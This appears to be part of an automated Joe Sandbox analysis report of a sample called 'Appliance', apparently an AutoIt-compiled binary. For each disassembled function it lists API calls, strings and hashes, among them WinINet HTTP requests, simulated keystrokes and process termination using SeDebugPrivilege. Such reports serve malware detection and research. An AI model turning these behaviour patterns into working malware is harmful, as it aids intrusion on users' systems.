Opcode Fuzzy Hash: e7f4f3b01985e812e72174f9b06afb0dae6f309a6db1fcf15080539a962ab717
Instruction Fuzzy Hash: 0471D134604204AFDF259F51C984FBABBB9FF49306F042C5AEC45B7262CB31A948CB11

Function 00DC7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00DC74D7

Part of subcall function 00DC7567: GetClientRect.USER32(?,?), ref: 00DC758D
Part of subcall function 00DC7567: GetWindowRect.USER32(?,?), ref: 00DC75CE
Part of subcall function 00DC7567: ScreenToClient.USER32(?,?), ref: 00DC75F6

GetDC.USER32 ref: 00E06083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E06096
SelectObject.GDI32(00000000,00000000), ref: 00E060A4
SelectObject.GDI32(00000000,00000000), ref: 00E060B9
ReleaseDC.USER32(?,00000000), ref: 00E060C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E06152

Strings

U, xrefs: 00E06021

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: de44e1580b850e6178afb756d49491014d63bade35713df012b83f380c580504
Instruction ID: de3edd043c0cd80922622dba67011112a0e7a51396c7b412882a000a7c28eef7
Opcode Fuzzy Hash: de44e1580b850e6178afb756d49491014d63bade35713df012b83f380c580504
Instruction Fuzzy Hash: D771FF31504206EFCF358F64CC84BAA3BB5FF48325F14566AED596B2A2C73088A5DF60

Function 00E3CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E3CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E3CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E3CD0F
GetLastError.KERNEL32 ref: 00E3CD67
SetEvent.KERNEL32(?), ref: 00E3CD7B
InternetCloseHandle.WININET(00000000), ref: 00E3CD86

Strings

, xrefs: 00E3CD00

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 3c2e97fc4ecb876459b08e41d7b6a5858e4b176fa73c8f63fd060a5ffb1c6d3f
Instruction ID: 0cf97b5b05e57ee7041116bd7542869394ec00059bfac60ebe991e79ff1f1f73
Opcode Fuzzy Hash: 3c2e97fc4ecb876459b08e41d7b6a5858e4b176fa73c8f63fd060a5ffb1c6d3f
Instruction Fuzzy Hash: 7F318BB1504308AFD721AF659C88ABB7FFCEB48744F60592AF446F2210DB30E908DB61

Function 00E2A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E055AE,?,?,Bad directive syntax error,00E5DCD0,00000000,00000010,?,?), ref: 00E2A236
LoadStringW.USER32(00000000,?,00E055AE,?), ref: 00E2A23D

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E2A301

Strings

Error: , xrefs: 00E2A2CF
%s (%d) : ==> %s.: %s %s, xrefs: 00E2A26B
Line %d:, xrefs: 00E2A28C
., xrefs: 00E2A2E7
Line %d (File "%s"):, xrefs: 00E2A2A7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 75685bb17bf997ae1282a76849c4bfa2e6af1c7aa96ca2a3c5f6b6deb0e4b3c4
Instruction ID: b532357e20e404e2f7cd60e31046ac3edc6b1c0cef5a5ecb107c3ceb661f1134
Opcode Fuzzy Hash: 75685bb17bf997ae1282a76849c4bfa2e6af1c7aa96ca2a3c5f6b6deb0e4b3c4
Instruction Fuzzy Hash: DB212F3280435AEFCF11AB90CC06EEE7779FF18700F045469F51A760A2DA71A558DB71

Function 00E229EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00E229F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00E22A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E22A9A

Strings

smallicons, xrefs: 00E22A62
largeicons, xrefs: 00E22A2E
details, xrefs: 00E22A48
list, xrefs: 00E22A7C
SHELLDLL_DefView, xrefs: 00E22A19

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: f6945474273f4775c2bcd08398a1e3526fb41c1e33277835e0711683d492f04a
Instruction ID: 1fa8a0c2d6bf57cefbecbd8f67bd2555feb9217ca322452dc70936a6ba1b959f
Opcode Fuzzy Hash: f6945474273f4775c2bcd08398a1e3526fb41c1e33277835e0711683d492f04a
Instruction Fuzzy Hash: 9E11C6B6648317BDFA247722FC07EA637ACDF15728B20101AF70CF54D1FBA1A8514624

Function 00DC7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00DC758D
GetWindowRect.USER32(?,?), ref: 00DC75CE
ScreenToClient.USER32(?,?), ref: 00DC75F6
GetClientRect.USER32(?,?), ref: 00DC773A
GetWindowRect.USER32(?,?), ref: 00DC775B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 43102c84d5d06e5a780d2046b783771fd9220b3c56cbe1f37fc3c34d0821fd1d
Instruction ID: 576ece4ffc757fc9457290f009d31ee222eb5442789c292abd450dd87a14a88a
Opcode Fuzzy Hash: 43102c84d5d06e5a780d2046b783771fd9220b3c56cbe1f37fc3c34d0821fd1d
Instruction Fuzzy Hash: 2DC16B3990464AEFDB10CFA9C940BEDB7F1FF18314F14941AE899A7250D734A991DF60

Function 00DFD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00DFD237
_free.LIBCMT ref: 00DFD2A2
_free.LIBCMT ref: 00DFD2C8
_free.LIBCMT ref: 00DFD2F1
_free.LIBCMT ref: 00DFD329
_free.LIBCMT ref: 00DFD35A
_free.LIBCMT ref: 00DFD39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00DFD41C
_free.LIBCMT ref: 00DFD435

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 5f456bd323c3f34d6d95490c89684c8434bbcfabcfef979e7dd14a4d2073ae85
Instruction ID: 1fd94de4257ec8f774f148e16e41fa044586468ec28dc23659da8c33e9d67e67
Opcode Fuzzy Hash: 5f456bd323c3f34d6d95490c89684c8434bbcfabcfef979e7dd14a4d2073ae85
Instruction Fuzzy Hash: 1A61F97190430DAFDB21AF75D8816BE7BD7DF01324B0A81AEEB44A7285D632994087B5

Function 00E55B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E55C24
ShowWindow.USER32(?,00000000), ref: 00E55C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00E55C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E55C6F

Part of subcall function 00E579F2: DeleteObject.GDI32(00000000), ref: 00E57A1E

GetWindowLongW.USER32(?,000000F0), ref: 00E55CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E55CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E55CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E55D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E55D34

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 974be4914bd650ce34fc3cdeb3c75e497938da7e4369b117e46db472638810bf
Instruction ID: 3be4826e2944ff22898e5294353a06020b646d74f3d7e69392cf91a232592e10
Opcode Fuzzy Hash: 974be4914bd650ce34fc3cdeb3c75e497938da7e4369b117e46db472638810bf
Instruction Fuzzy Hash: 2051EF32A40B09BFEF249B24CC59FD97BA1EF05316F146806FE14BA1E0C771A988CB51

Function 00E3CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E3CBC7
GetLastError.KERNEL32 ref: 00E3CBDA
SetEvent.KERNEL32(?), ref: 00E3CBEE

Part of subcall function 00E3CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E3CCB7
Part of subcall function 00E3CC98: GetLastError.KERNEL32 ref: 00E3CD67
Part of subcall function 00E3CC98: SetEvent.KERNEL32(?), ref: 00E3CD7B
Part of subcall function 00E3CC98: InternetCloseHandle.WININET(00000000), ref: 00E3CD86

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 2e3bec75c83a7c83cef366a431f5fdebadea223daac330888d1703c3414528f9
Instruction ID: 49f4daf29f34dcc4f263639991b1f671a84c00d7654ad51faf46a92f4306a11b
Opcode Fuzzy Hash: 2e3bec75c83a7c83cef366a431f5fdebadea223daac330888d1703c3414528f9
Instruction Fuzzy Hash: 5D315C71504705AFDB259F61CD48AB6BFE8FF08305F24691DF95AB2620D731E814EB60

Function 00E22EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E24393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E243AD
Part of subcall function 00E24393: GetCurrentThreadId.KERNEL32 ref: 00E243B4
Part of subcall function 00E24393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E22F00), ref: 00E243BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00E22F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E22F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E22F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E22F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E22F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E22F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E22F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E22F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E22F74

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: cd65677b186b23f0b60ab897345bf73ad0f4cbc35a4b21158bb6089040cd4d98
Instruction ID: 7f32f1f47f154cd332a686dbceb7840332223bef300a2f67aa4b625ae2f9faa1
Opcode Fuzzy Hash: cd65677b186b23f0b60ab897345bf73ad0f4cbc35a4b21158bb6089040cd4d98
Instruction Fuzzy Hash: A101D8707887207FFB2067699C8AF593F99EB4DB12F100415F318BF1E0C9E15444CAA9

Function 00E22150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E21D95,?,?,00000000), ref: 00E22159
HeapAlloc.KERNEL32(00000000,?,00E21D95,?,?,00000000), ref: 00E22160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E21D95,?,?,00000000), ref: 00E22175
GetCurrentProcess.KERNEL32(?,00000000,?,00E21D95,?,?,00000000), ref: 00E2217D
DuplicateHandle.KERNEL32(00000000,?,00E21D95,?,?,00000000), ref: 00E22180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E21D95,?,?,00000000), ref: 00E22190
GetCurrentProcess.KERNEL32(00E21D95,00000000,?,00E21D95,?,?,00000000), ref: 00E22198
DuplicateHandle.KERNEL32(00000000,?,00E21D95,?,?,00000000), ref: 00E2219B
CreateThread.KERNEL32(00000000,00000000,00E221C1,00000000,00000000,00000000), ref: 00E221B5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: bce2f000b77e166966f3c3d7d0528f2a89e0cd4b9cd8c2488a9f3ea411d55d2b
Instruction ID: d6f7aecd54f814f86e4d2aa8ee8197201422e0c30cb2e4ffe59bde544ad0f3d6
Opcode Fuzzy Hash: bce2f000b77e166966f3c3d7d0528f2a89e0cd4b9cd8c2488a9f3ea411d55d2b
Instruction Fuzzy Hash: 7101BBB5245704BFEB20AFA6DD4DF6B7BACEB88711F004811FA05EB1A1CA709804CB21

Function 00E2CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E2CF99
_wcslen.LIBCMT ref: 00E2CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E2D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E2D075

Strings

<*, xrefs: 00E2CEF6
0, xrefs: 00E2CF5A
,*, xrefs: 00E2CF0C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*$0$<*
API String ID: 1227352736-815946194
Opcode ID: c8ccc9e352d2dd91184ffd6c8beea583448f94bee26077a711abbb2c0cabb607
Instruction ID: eb4d20a989f71183f04287ddf0f1c8a4c731bea7416057f6c3330b45136a7fb5
Opcode Fuzzy Hash: c8ccc9e352d2dd91184ffd6c8beea583448f94bee26077a711abbb2c0cabb607
Instruction Fuzzy Hash: BA51C1716083209AD714AF24ED45BAF77E9EF45318F041A2DFA95E31E0DBA0C9458762

Function 00E4AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00E2DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E2DDAC
Part of subcall function 00E2DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E2DDBA
Part of subcall function 00E2DD87: CloseHandle.KERNEL32(00000000), ref: 00E2DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4ABCA
GetLastError.KERNEL32 ref: 00E4ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E4ACC5
GetLastError.KERNEL32(00000000), ref: 00E4ACD0
CloseHandle.KERNEL32(00000000), ref: 00E4AD21

Strings

SeDebugPrivilege, xrefs: 00E4ABEC

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 8771149eed6a52b7571e1a4b5fe0cead5f7b4b1ed387fd08e7c47eac0c512267
Instruction ID: a0b2b14bac10ea050ffd664a19b80271dd35f8a866f27a622ff00da1c9b5eeb3
Opcode Fuzzy Hash: 8771149eed6a52b7571e1a4b5fe0cead5f7b4b1ed387fd08e7c47eac0c512267
Instruction Fuzzy Hash: 4E61AE702482429FD324DF15D484F25BBE1EF54318F1888ACE4669BBA3C771EC49CBA2

Function 00E54322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E543C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E543D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E543F0
_wcslen.LIBCMT ref: 00E54435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00E54462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E54490

Strings

SysListView32, xrefs: 00E54393

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: ba6f017b8b0e20be029350a86f1c04f6557a851f58be8af2b89d05dfd48c2efc
Instruction ID: 80b13fcfaf6dec23402b796fae70b48ba1f43b5d648a0afde7e956baf9054bea
Opcode Fuzzy Hash: ba6f017b8b0e20be029350a86f1c04f6557a851f58be8af2b89d05dfd48c2efc
Instruction Fuzzy Hash: 2A41C371A00309ABDF219F64CC49BEA7BA9FF48359F101926F958F72D1D7709988CB90

Function 00E2C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E2C6C4
IsMenu.USER32(00000000), ref: 00E2C6E4
CreatePopupMenu.USER32 ref: 00E2C71A
GetMenuItemCount.USER32(01976D60), ref: 00E2C76B
InsertMenuItemW.USER32(01976D60,?,00000001,00000030), ref: 00E2C793

Strings

2, xrefs: 00E2C6FE
0, xrefs: 00E2C66F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 806de168517aaab122ff8bc04d1c3c90507b99f4f4cb10d296ce982a2e3d0b6e
Instruction ID: 6aab090e90c224c20be942a035eb43da79806fb90fdc8e9129cd00a0aad87caf
Opcode Fuzzy Hash: 806de168517aaab122ff8bc04d1c3c90507b99f4f4cb10d296ce982a2e3d0b6e
Instruction Fuzzy Hash: 6651AE706002299BDF20CF78E884BAEBBF4AF48318F34561BE916B7291D7709945CF61

Function 00DC1B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

BeginPaint.USER32(?,?,?), ref: 00DC1B35
GetWindowRect.USER32(?,?), ref: 00DC1B99
ScreenToClient.USER32(?,?), ref: 00DC1BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DC1BC7
EndPaint.USER32(?,?,?,?,?), ref: 00DC1C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E03287

Part of subcall function 00DC1C2D: BeginPath.GDI32(00000000), ref: 00DC1C4B

Strings

(, xrefs: 00DC1B0F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

